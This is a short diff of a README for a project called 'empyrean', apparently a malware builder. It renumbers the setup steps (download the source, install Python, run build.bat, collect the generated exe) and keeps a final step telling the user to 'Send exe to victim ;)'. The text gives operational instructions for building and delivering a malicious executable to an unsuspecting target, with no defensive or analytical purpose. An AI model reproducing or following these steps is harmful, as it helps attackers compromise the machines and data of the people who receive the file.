addi00000/empyrean/README.md

 #### Setup
 1. Download and extract the [source code](https://github.com/addi00000/empyrean/archive/refs/heads/main.zip)
+2. If you have never installed python before run install_python.bat
-2. Run the builder by double clicking the `build.bat` file
+3. Run the builder by double clicking the `build.bat` file
-3. Follow instructions in builder and your exe will be in the same directory
+4. Follow instructions in builder and your exe will be in the same directory
-4. Send exe to victim ;)
+5. Send exe to victim ;)

 <hr style="border-radius: 2%; margin-top: 60px; margin-bottom: 60px;" noshade="" size="20" width="100%">